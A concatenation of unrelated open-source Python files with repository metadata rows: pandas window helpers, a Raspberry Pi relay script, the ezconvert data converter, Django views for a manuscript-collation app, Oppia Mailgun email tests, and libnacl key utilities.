result = result.swaplevel(1, 0).sort_index()
result.index = MultiIndex.from_product(
[result_index] + [arg2.columns])
else:
# empty result
result = DataFrame(
index=MultiIndex(levels=[arg1.index, arg2.columns],
labels=[[], []]),
columns=arg2.columns,
dtype='float64')
# reset our index names to arg1 names
# reset our column names to arg2 names
# careful not to mutate the original names
result.columns = result.columns.set_names(
arg1.columns.names)
result.index = result.index.set_names(
result_index.names + arg2.columns.names)
return result
else:
raise ValueError("'pairwise' is not True/False")
else:
results = {}
for i, col in enumerate(arg1.columns):
results[i] = f(*_prep_binary(arg1.iloc[:, i], arg2))
return dataframe_from_int_dict(results, arg1)
else:
return _flex_binary_moment(arg2, arg1, f)
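# Illustrative sketch (not part of pandas): shape of what _flex_binary_moment
# returns for two aligned DataFrames that both carry columns ['A', 'B']:
#   pairwise=False -> a DataFrame with columns ['A', 'B'] (matching columns only)
#   pairwise=True  -> a MultiIndexed DataFrame pairing each original index label
#                     with a column label, so every timestamp contributes a 2x2
#                     block of the moment matrix.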
def _get_center_of_mass(comass, span, halflife, alpha):
valid_count = com._count_not_none(comass, span, halflife, alpha)
if valid_count > 1:
raise ValueError("comass, span, halflife, and alpha "
"are mutually exclusive")
# Convert to center of mass; domain checks ensure 0 < alpha <= 1
if comass is not None:
if comass < 0:
raise ValueError("comass must satisfy: comass >= 0")
elif span is not None:
if span < 1:
raise ValueError("span must satisfy: span >= 1")
comass = (span - 1) / 2.
elif halflife is not None:
if halflife <= 0:
raise ValueError("halflife must satisfy: halflife > 0")
decay = 1 - np.exp(np.log(0.5) / halflife)
comass = 1 / decay - 1
elif alpha is not None:
if alpha <= 0 or alpha > 1:
raise ValueError("alpha must satisfy: 0 < alpha <= 1")
comass = (1.0 - alpha) / alpha
else:
raise ValueError("Must pass one of comass, span, halflife, or alpha")
return float(comass)
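# Illustrative sketch (not part of pandas): the decay conversions implemented
# above, spelled out for a quick sanity check. The helper below is illustrative
# only and is not referenced anywhere else in this module.
def _center_of_mass_examples():
    # span=5     -> com = (5 - 1) / 2 = 2.0
    # halflife=1 -> alpha = 1 - exp(log(0.5) / 1) = 0.5, so com = 1 / 0.5 - 1 ~= 1.0
    # alpha=0.25 -> com = (1 - 0.25) / 0.25 = 3.0
    return (_get_center_of_mass(None, 5, None, None),
            _get_center_of_mass(None, None, 1, None),
            _get_center_of_mass(None, None, None, 0.25))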
def _offset(window, center):
if not is_integer(window):
window = len(window)
offset = (window - 1) / 2. if center else 0
try:
return int(offset)
    except (TypeError, ValueError):
return offset.astype(int)
def _require_min_periods(p):
def _check_func(minp, window):
if minp is None:
return window
else:
return max(p, minp)
return _check_func
def _use_window(minp, window):
if minp is None:
return window
else:
return minp
def _zsqrt(x):
with np.errstate(all='ignore'):
result = np.sqrt(x)
mask = x < 0
if isinstance(x, ABCDataFrame):
if mask.values.any():
result[mask] = 0
else:
if mask.any():
result[mask] = 0
return result
def _prep_binary(arg1, arg2):
if not isinstance(arg2, type(arg1)):
raise Exception('Input arrays must be of the same type!')
# mask out values, this also makes a common index...
X = arg1 + 0 * arg2
Y = arg2 + 0 * arg1
return X, Y
# Top-level exports
def rolling(obj, win_type=None, **kwds):
if not isinstance(obj, (ABCSeries, ABCDataFrame)):
raise TypeError('invalid type: %s' % type(obj))
if win_type is not None:
return Window(obj, win_type=win_type, **kwds)
return Rolling(obj, **kwds)
rolling.__doc__ = Window.__doc__
def expanding(obj, **kwds):
if not isinstance(obj, (ABCSeries, ABCDataFrame)):
raise TypeError('invalid type: %s' % type(obj))
return Expanding(obj, **kwds)
expanding.__doc__ = Expanding.__doc__
def ewm(obj, **kwds):
if not isinstance(obj, (ABCSeries, ABCDataFrame)):
raise TypeError('invalid type: %s' % type(obj))
return EWM(obj, **kwds)
ewm.__doc__ = EWM.__doc__
| 32.09457 | 95 | 0.567342 |
d061022c023c772520a2c32c9195928b8e49807d | 639 | py | Python | web/setpin.py | siskulous/PiStrip | f980705b90f7e0a397b2e6802121a531a5ff79b6 | [
"MIT"
] | null | null | null | web/setpin.py | siskulous/PiStrip | f980705b90f7e0a397b2e6802121a531a5ff79b6 | [
"MIT"
] | null | null | null | web/setpin.py | siskulous/PiStrip | f980705b90f7e0a397b2e6802121a531a5ff79b6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from RPi import GPIO
import sys
import MySQLdb
db=MySQLdb.connect(user='webhead',
passwd='MonkeyBoneIsATerribleMovie',
db='powerstrip',
host="localhost")
GPIO.setmode(GPIO.BCM)
state=int(sys.argv[2])
pin= int(sys.argv[1])
if pin == 1:
relay=6
elif pin == 2:
relay=13
elif pin == 3:
relay=19
elif pin == 4:
relay=26
else:
    print("Invalid relay")
sys.exit()
'''
gpio.init()
gpio.setcfg(relay, gpio.OUTPUT)
gpio.output(relay, state)
'''
GPIO.setup(relay,GPIO.OUT)
GPIO.output(relay,state)
q=db.cursor()
query="UPDATE outlets SET currentState=%s WHERE oid=%s"
q.execute(query, (state, pin))
db.commit()
db.close()
af991f621d6f2f1ecfae882e8d932673d5d0d7b1 | 9,114 | py | Python | ezconvert/convert.py | blahoink/ezconvert | 82403ba5c37f73323709db3de78e18e860e824e0 | [
"MIT"
] | null | null | null | ezconvert/convert.py | blahoink/ezconvert | 82403ba5c37f73323709db3de78e18e860e824e0 | [
"MIT"
] | null | null | null | ezconvert/convert.py | blahoink/ezconvert | 82403ba5c37f73323709db3de78e18e860e824e0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
import argparse
import csv
import io
import logging
import numpy as np
import os
import pandas as pd
import pkg_resources
import sys
import yaml
from .version import __version__
logger = logging.getLogger('root')
provided_converters = [
'mq2pin',
'mq2pcq',
'mq2psea',
'mq2elutator_trainer',
'mq2tmtc'
]
def write_df_to_file(df, headers, out_path):
with open(out_path, 'w') as f:
f.write(headers)
logger.info('Writing output to {} ...'.format(out_path))
df.to_csv(out_path, sep=output_sep, header=False,
index=write_row_names, mode='a', quoting=quoting)
def convert_files(config_file_name=None, input_list=None, input_files=None, output=None):
if config_file_name is None:
raise Exception('No configuration file (existing name or file path) provided.')
# load vars from the config file
if isinstance(config_file_name, io.BufferedReader):
config_file = config_file_name.read()
config_file_name = 'buffer'
elif config_file_name in provided_converters:
config_file = pkg_resources.resource_string('ezconvert', '/'.join(('converters', config_file_name + '.py')))
else:
logger.info('Loading config file functions from {}.'.format(config_file_name))
with open(config_file_name, 'rb') as f:
config_file = f.read()
exec(compile(config_file, config_file_name, 'exec'), globals())
# read inputs, either from the input list or from the command line
_input = []
if input_list is not None:
logger.info('Reading in input files from input list {}.'.format(input_list.name))
with open(input_list.name, 'r') as f:
            _input = yaml.safe_load(f)
else:
logger.info('Reading in input files from command line.')
_input = [f.name for f in input_files]
if len(_input) == 0:
raise Exception('No input files provided, either from the input list or the command line.')
df = pd.DataFrame()
# iterate through each input file provided.
for i, f in enumerate(_input):
# first expand user or any vars
f = os.path.expanduser(f)
f = os.path.expandvars(f)
logger.info('Reading in input file #{} | {} ...'.format(i+1, f))
dfa = pd.read_csv(f, sep=input_sep, low_memory=False)
logger.info('Read {} PSMs'.format(dfa.shape[0]))
# track input file with input id
dfa['input_id'] = i
df = df.append(dfa)
# filter observations
logger.info('Filtering observations...')
# before we filter, assign every row an ID
df['id'] = range(0, df.shape[0])
# by default, exclude nothing. we'll use binary ORs (|) to
# gradually add more and more observations to this exclude blacklist
df['exclude'] = np.repeat(False, df.shape[0])
# run all the filters specified by the list in the input config file
# all filter functions are passed df, and the run configuration
# after each filter, append it onto the exclusion master list with a bitwise OR
# if the filter function returns None, then just ignore it.
for i, f in enumerate(filters):
logger.info('Applying filter #{}: \"{}\"'.format(i+1, f))
e = filters[f](df)
        if e is not None:
            logger.info('Marked {} observations for filtering'.format(np.sum(e)))
            df['exclude'] = (df['exclude'] | e)
logger.info('{} / {} ({:.2%}) observations pass filters'.format(df.shape[0] - df['exclude'].sum(), df.shape[0], (df.shape[0] - df['exclude'].sum()) / df.shape[0]))
# apply exclusion filter
df = df[~df['exclude']].reset_index(drop=True)
# create output frame
df_out = pd.DataFrame()
# apply transformations
logger.info('Transforming data...')
for i, t in enumerate(transformations):
logger.info('Applying transformation #{}: \"{}\"'.format(i+1, t))
trans = transformations[t]
# if transformation is a string, then simply copy the old column
# to the new output one
if type(trans) is str:
df_out[t] = df[trans]
# if transformation is a function, and the transformation name
# begins with a '__', then apply the transformation over the
# entire data frame.
# this is useful for doing matrix maths that spans over multiple
# columns, or rows, or something that involves more than just one
# column.
elif callable(trans) and t[0:2] == '__':
df_out = trans(df, df_out)
# if transformation is a function, then call that function to
# generate the new column for the output
elif callable(trans):
df_out[t] = trans(df, df_out)
# if transformation is a constant number, then just set all values
# of that name to the specified number
# don't have to vectorize, pandas will handle that.
elif type(trans) is int or type(trans) is float:
df_out[t] = trans
else:
raise Exception('Invalid transformation type: {}. Please provide either a string or a function'.format(type(trans)))
# write headers and weights
headers = ''
# column headers
if write_header:
for i, col in enumerate(df_out.columns):
if quoting == csv.QUOTE_ALL or quoting == csv.QUOTE_NONNUMERIC:
headers += ("\"" + col + "\"")
else:
headers += col
if i != (len(df_out.columns)-1):
headers += output_sep
headers += '\n'
# additional header
if 'additional_headers' in globals() and len(additional_headers) > 0:
for i, w in enumerate(additional_headers):
headers += w
            if i != (len(additional_headers)-1):
headers += output_sep
headers += '\n'
if output is None:
# if none, then return the dataframe
return (df_out, headers)
else:
if 'sep_by' in globals() and type(sep_by) is str:
# separate output files based on a certain column
if sep_by in df_out.columns:
sep_by_vals = df_out[sep_by]
elif sep_by in df.columns:
sep_by_vals = df[sep_by]
else:
raise Exception('File separator not found in the columns of either the input file or the transformed output file.')
# create the output path if necessary
if not os.path.exists(output):
logger.info('Path for output folder {} does not exist. Creating...'.format(output))
os.makedirs(output)
# get unique categories
cats = np.unique(sep_by_vals)
logger.info('Splitting observations into separate files by "' + sep_by + '"')
logger.info('Categories: [' + ' '.join(cats) + ']')
# iterate over each category
for c in cats:
out_path = os.path.join(output, '{}{}'.format(c, output_type))
logger.info('Saving category file {} to {}'.format(c, out_path))
df_a = df_out.loc[sep_by_vals == c]
write_df_to_file(df_a, headers, out_path)
else:
# if no separation, then write the entire collated df to file
logger.info('Saving combined file to {}'.format(output))
write_df_to_file(df_out, headers, output)
logger.info('Done!')
return None
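# Illustrative sketch of a hypothetical conversion config (not one of the bundled
# converters): these are the module-level names that convert_files() above expects
# an exec'd config file to define. The column names used in the example filter and
# transformations are placeholders, not guaranteed input columns.
#
#   input_sep = '\t'
#   output_sep = '\t'
#   output_type = '.txt'
#   write_header = True
#   write_row_names = False
#   quoting = csv.QUOTE_NONE
#   filters = {
#       'remove reverse hits': lambda df: df['Proteins'].str.startswith('REV__'),
#   }
#   transformations = {
#       'SpecId': 'id',                                  # copy a column
#       'ScanNr': lambda df, df_out: df['Scan Number'],  # computed column
#       'Label': 1,                                      # constant column
#   }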
def main():
# load command-line args
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action='store_true', default=False,
help='Run in verbose mode. If piping output from stdout to a file, leave this off to exclude all logging messages.')
parser.add_argument('--config-file', required=True, type=str,
help='One of these converters: [' + ' '.join(provided_converters) + '], or a path to conversion configuration script. See list of converters in converters/ folder')
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument('--input-list', type=argparse.FileType('r', encoding='UTF-8'),
help='List of input files, in YAML format.')
input_group.add_argument('-i', '--input', type=argparse.FileType('r', encoding='UTF-8'),
nargs='+', help='List of input files, separated by spaces.')
parser.add_argument('--version', action='version', version='%(prog)s {version}'.format(version=__version__), help='Display the program\'s version')
parser.add_argument('-o', '--output', type=str,
help='Path to output data. Default: Leave empty to print to stdout')
args = parser.parse_args()
# initialize logger
# set up logger
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
logFormatter = logging.Formatter('%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s')
logger = logging.getLogger('root')
if args.verbose: logger.setLevel(logging.DEBUG)
else: logger.setLevel(logging.WARNING)
"""
if log_to_file:
fileHandler = logging.FileHandler(log_file_path, mode='w')
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
"""
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
logger.info(' '.join(sys.argv[0:]))
(df_out, headers) = convert_files(config_file_name=args.config_file, input_list=args.input_list, input_files=args.input, output=args.output)
if args.output is None and df_out is not None:
# if none, then just print to stdout
print(headers, end='')
print(df_out.to_string(header=False, index=write_row_names, sparsify=False))
if __name__ == '__main__':
main() | 35.189189 | 168 | 0.680162 |
da4f9d8b121d836dfaf33e2ca72158e5135e6a9a | 5,491 | py | Python | dcodex_carlson/views.py | rbturnbull/dcodex_carlson | e662e58ad38915b10f079075d69adae463dd7ecd | [
"Apache-2.0"
] | null | null | null | dcodex_carlson/views.py | rbturnbull/dcodex_carlson | e662e58ad38915b10f079075d69adae463dd7ecd | [
"Apache-2.0"
] | null | null | null | dcodex_carlson/views.py | rbturnbull/dcodex_carlson | e662e58ad38915b10f079075d69adae463dd7ecd | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from dcodex.util import get_request_dict
import logging
from .models import *
def index(request):
return HttpResponse("Hello, world. You're at the DCodex Carlson index.")
def location_siglum( request, location_id, siglum_text ):
location = get_object_or_404(Location, id=location_id)
sublocations = location.sublocation_set.all()
    siglum = get_object_or_404(Siglum, name=siglum_text)
verse_labels = location.closest_verse_labels().all()
transcription = None
manuscript = None
bible_verse = None
if siglum.witness.manuscript and len(verse_labels) > 0:
manuscript = siglum.witness.manuscript
bible_verse = verse_labels[0].bible_verse()
transcription = manuscript.transcription( bible_verse )
return render(request, 'dcodex_carlson/location.html', {'location': location, 'manuscript':manuscript, 'bible_verse':bible_verse, 'transcription':transcription, 'sublocations': sublocations, 'siglum':siglum, 'witness':siglum.witness, 'parallel':None, 'verse_labels':verse_labels,} )
def location_siglum_parallel( request, location_id, siglum_text, parallel_code ):
location = get_object_or_404(Location, id=location_id)
sublocations = location.sublocation_set.all()
siglum = get_object_or_404(Siglum, name=siglum_text)
parallel = get_object_or_404(Parallel, code=parallel_code)
verse_labels = [verse_label for verse_label in location.closest_verse_labels().all() if verse_label.parallel == parallel]
transcription = None
manuscript = None
bible_verse = None
if siglum.witness.manuscript and len(verse_labels) > 0:
manuscript = siglum.witness.manuscript
bible_verse = verse_labels[0].bible_verse()
transcription = manuscript.transcription( bible_verse )
return render(request, 'dcodex_carlson/location.html', {'location': location, 'manuscript':manuscript, 'bible_verse':bible_verse,'transcription':transcription, 'sublocations': sublocations, 'siglum':siglum, 'witness':siglum.witness, 'parallel':parallel, 'verse_labels':verse_labels,} )
def location( request, location_id ):
location = get_object_or_404(Location, id=location_id)
sublocations = location.sublocation_set.all()
return render(request, 'dcodex_carlson/location.html', {'location': location, 'sublocations': sublocations} )
def attestations( request ):
request_dict = get_request_dict(request)
reading_code = request_dict.get('code')
sublocation_id = request_dict.get('sublocation_id')
sublocation = get_object_or_404(SubLocation, id=sublocation_id)
parallels = sublocation.get_parallels()
html = ""
for parallel in parallels:
parallel_switch = ""
if parallel:
parallel_switch = "/%s " % parallel.code
html += "<div>" + str(parallel_switch) + sublocation.code_attestations_string(reading_code, parallel) + "</div>"
return HttpResponse(html)
def set_attestation( request ):
request_dict = get_request_dict(request)
reading_code = request_dict.get('code')
corrector = request_dict.get('corrector')
sublocation_id = request_dict.get('sublocation_id')
sublocation = get_object_or_404(SubLocation, id=sublocation_id)
witness_id = request_dict.get('witness_id')
witness = get_object_or_404(Witness, id=witness_id)
parallel = None
parallel_id = request_dict.get('parallel_id')
parallel_code = request_dict.get('parallel_code')
if parallel_id:
parallel = get_object_or_404(Parallel, id=parallel_id)
elif parallel_code:
parallel = get_object_or_404(Parallel, code=parallel_code)
logger = logging.getLogger(__name__)
    logger.debug("Parallel in view")
    logger.debug(parallel)
response = witness.set_attestation( sublocation=sublocation, code=reading_code, parallel=parallel, corrector=corrector )
return HttpResponse("OK" if response else "FAIL")
def set_text( request ):
request_dict = get_request_dict(request)
corrector = request_dict.get('corrector')
sublocation_id = request_dict.get('sublocation_id')
sublocation = get_object_or_404(SubLocation, id=sublocation_id)
witness_id = request_dict.get('witness_id')
witness = get_object_or_404(Witness, id=witness_id)
parallel = None
parallel_id = request_dict.get('parallel_id')
parallel_code = request_dict.get('parallel_code')
if parallel_id:
parallel = get_object_or_404(Parallel, id=parallel_id)
elif parallel_code:
parallel = get_object_or_404(Parallel, code=parallel_code)
logger = logging.getLogger(__name__)
    logger.debug("Parallel in view")
    logger.debug(parallel)
attestation = witness.get_attestation( sublocation=sublocation, parallel=parallel, corrector=corrector )
if attestation:
attestation.text = request_dict.get('text')
attestation.save()
return HttpResponse("OK")
return HttpResponse("FAIL")
| 37.101351 | 289 | 0.726097 |
72078488953ec5a998650e2c840d109b1e067013 | 10,255 | py | Python | core/platform/email/mailgun_email_services_test.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | 5 | 2022-01-22T17:22:23.000Z | 2022-02-04T09:21:24.000Z | core/platform/email/mailgun_email_services_test.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | null | null | null | core/platform/email/mailgun_email_services_test.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | 2 | 2022-03-22T16:57:32.000Z | 2022-03-24T17:38:42.000Z | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Mailgun API wrapper."""
from __future__ import annotations
import urllib
from core import feconf
from core import utils
from core.platform.email import mailgun_email_services
from core.tests import test_utils
from typing import Dict, Tuple
MailgunQueryType = Tuple[str, bytes, Dict[str, str]]
class EmailTests(test_utils.GenericTestBase):
"""Tests for sending emails."""
    class Response:
        """Class to mock utils.url_open responses."""
def __init__(
self, url: MailgunQueryType, expected_url: MailgunQueryType
) -> None:
self.url = url
self.expected_url = expected_url
def getcode(self) -> int:
"""Gets the status code of this url_open mock.
Returns:
int. 200 to signify status is OK. 500 otherwise.
"""
return 200 if self.url == self.expected_url else 500
def test_send_email_to_mailgun(self) -> None:
"""Test for sending HTTP POST request."""
# Test sending email without bcc, reply_to or recipient_variables.
expected_query_url: MailgunQueryType = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=b%40b.com&'
b'recipient_variables=%7B%7D',
{'Authorization': 'Basic YXBpOmtleQ=='}
)
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swapped_request = lambda *args: args
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
self.assertTrue(resp)
# Test sending email with single bcc and single recipient email.
expected_query_url = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=b%40b.com&'
b'bcc=c%40c.com&'
b'h%3AReply-To=abc&'
b'recipient_variables=%7B%27b%40b.com'
b'%27%3A+%7B%27first%27%3A+%27Bob%27%2C+%27id%27%3A+1%7D%7D',
{'Authorization': 'Basic YXBpOmtleQ=='})
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂',
bcc=['c@c.com'],
reply_to='abc',
recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}})
self.assertTrue(resp)
# Test sending email with single bcc, and multiple recipient emails
# differentiated by recipient_variables ids.
expected_query_url = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=b%40b.com&'
b'bcc=%5B%27c%40c.com%27%2C+%27d%40d.com%27%5D&'
b'h%3AReply-To=abc&'
b'recipient_variables=%7B%27b%40b.com'
b'%27%3A+%7B%27first%27%3A+%27Bob%27%2C+%27id%27%3A+1%7D%7D',
{'Authorization': 'Basic YXBpOmtleQ=='})
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂',
bcc=['c@c.com', 'd@d.com'],
reply_to='abc',
recipient_variables=({'b@b.com': {'first': 'Bob', 'id': 1}}))
self.assertTrue(resp)
def test_batch_send_to_mailgun(self) -> None:
"""Test for sending HTTP POST request."""
expected_query_url: MailgunQueryType = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=%5B%27b%40b.com%27%2C+%27c%40c.com%27%2C+%27d%40d.com%27%5D&'
b'recipient_variables=%7B%7D',
{'Authorization': 'Basic YXBpOmtleQ=='})
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swapped_request = lambda *args: args
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com', 'c@c.com', 'd@d.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
self.assertTrue(resp)
def test_mailgun_key_or_domain_name_not_set_raises_exception(self) -> None:
"""Test that exceptions are raised when API key or domain name are
unset.
"""
# Testing no mailgun api key.
mailgun_exception = self.assertRaisesRegex( # type: ignore[no-untyped-call]
Exception, 'Mailgun API key is not available.')
with mailgun_exception:
mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com', 'c@c.com', 'd@d.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
# Testing no mailgun domain name.
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
mailgun_exception = self.assertRaisesRegex( # type: ignore[no-untyped-call]
Exception, 'Mailgun domain name is not set.')
with swap_api, mailgun_exception:
mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com', 'c@c.com', 'd@d.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
def test_invalid_status_code_returns_false(self) -> None:
expected_query_url: MailgunQueryType = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=%5B%27b%40b.com%27%2C+%27c%40c.com%27%2C+%27d%40d.com%27%5D&'
b'recipient_variables=%7B%7D',
{'Authorization': 'Basic'})
swapped_request = lambda *args: args
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂',
bcc=['c@c.com', 'd@d.com'],
reply_to='abc',
recipient_variables=({'b@b.com': {'first': 'Bob', 'id': 1}}))
self.assertFalse(resp)
| 44.202586 | 83 | 0.589664 |
e06e07866618de5a5ea2a24026b3f29f2cafe3f8 | 3,027 | py | Python | libnacl/utils.py | jensbjorgensen/libnacl | 390f439ba5e5d5247464dda523c211132cc5faf9 | [
"Apache-2.0"
] | 61 | 2015-01-13T17:50:09.000Z | 2022-02-12T04:32:10.000Z | libnacl/utils.py | jensbjorgensen/libnacl | 390f439ba5e5d5247464dda523c211132cc5faf9 | [
"Apache-2.0"
] | 73 | 2015-01-03T00:52:41.000Z | 2021-07-16T17:28:57.000Z | libnacl/utils.py | jensbjorgensen/libnacl | 390f439ba5e5d5247464dda523c211132cc5faf9 | [
"Apache-2.0"
] | 50 | 2015-01-02T21:07:00.000Z | 2022-02-11T18:15:23.000Z | # -*- coding: utf-8 -*-
import struct
import sys
import time
# Import nacl libs
import libnacl
import libnacl.encode
import libnacl.secret
import libnacl.public
import libnacl.sign
import libnacl.dual
def load_key(path_or_file, serial='json'):
'''
Read in a key from a file and return the applicable key object based on
the contents of the file
'''
if hasattr(path_or_file, 'read'):
stream = path_or_file
else:
if serial == 'json':
stream = open(path_or_file, 'r')
else:
stream = open(path_or_file, 'rb')
try:
if serial == 'msgpack':
import msgpack
key_data = msgpack.load(stream)
elif serial == 'json':
import json
if sys.version_info[0] >= 3:
key_data = json.loads(stream.read())
else:
key_data = json.loads(stream.read(), encoding='UTF-8')
finally:
if stream != path_or_file:
stream.close()
if 'priv' in key_data and 'sign' in key_data and 'pub' in key_data:
return libnacl.dual.DualSecret(
libnacl.encode.hex_decode(key_data['priv']),
libnacl.encode.hex_decode(key_data['sign']))
elif 'priv' in key_data and 'pub' in key_data:
return libnacl.public.SecretKey(
libnacl.encode.hex_decode(key_data['priv']))
elif 'sign' in key_data:
return libnacl.sign.Signer(
libnacl.encode.hex_decode(key_data['sign']))
elif 'pub' in key_data:
return libnacl.public.PublicKey(
libnacl.encode.hex_decode(key_data['pub']))
elif 'verify' in key_data:
return libnacl.sign.Verifier(key_data['verify'])
elif 'priv' in key_data:
return libnacl.secret.SecretBox(
libnacl.encode.hex_decode(key_data['priv']))
raise ValueError('Found no key data')
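# Illustrative round-trip (not part of the original module; the file path below is
# hypothetical). load_key() dispatches on which hex-encoded fields are present, so a
# JSON file holding only "priv" comes back as a libnacl.secret.SecretBox:
#
#   import json, libnacl.encode, libnacl.utils
#   with open('/tmp/box.json', 'w') as fh:
#       json.dump({'priv': libnacl.encode.hex_encode(libnacl.utils.salsa_key()).decode()}, fh)
#   box = libnacl.utils.load_key('/tmp/box.json')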
def salsa_key():
'''
    Generates a salsa20 key
'''
return libnacl.randombytes(libnacl.crypto_secretbox_KEYBYTES)
def aead_key():
'''
Generates an AEAD key (both implementations use the same size)
'''
return libnacl.randombytes(libnacl.crypto_aead_aes256gcm_KEYBYTES)
def rand_aead_nonce():
'''
Generates and returns a random bytestring of the size defined in libsodium
as crypto_aead_aes256gcm_NPUBBYTES and crypto_aead_chacha20poly1305_ietf_NPUBBYTES
'''
return libnacl.randombytes(libnacl.crypto_aead_aes256gcm_NPUBBYTES)
def rand_nonce():
'''
Generates and returns a random bytestring of the size defined in libsodium
as crypto_box_NONCEBYTES
'''
return libnacl.randombytes(libnacl.crypto_box_NONCEBYTES)
def time_nonce():
'''
Generates and returns a nonce as in rand_nonce() but using a timestamp for the first 8 bytes.
This function now exists mostly for backwards compatibility, as rand_nonce() is usually preferred.
'''
nonce = rand_nonce()
return (struct.pack('=d', time.time()) + nonce)[:len(nonce)]
| 29.676471 | 102 | 0.647836 |
134434cd44bf7e46390ab3ce992beb4311c0af5f | 1,415 | py | Python | 013-C109-BellCurve-2/__main__.py | somePythonProgrammer/PythonCode | fb2b2245db631cefd916a960768f411969b0e78f | [
"MIT"
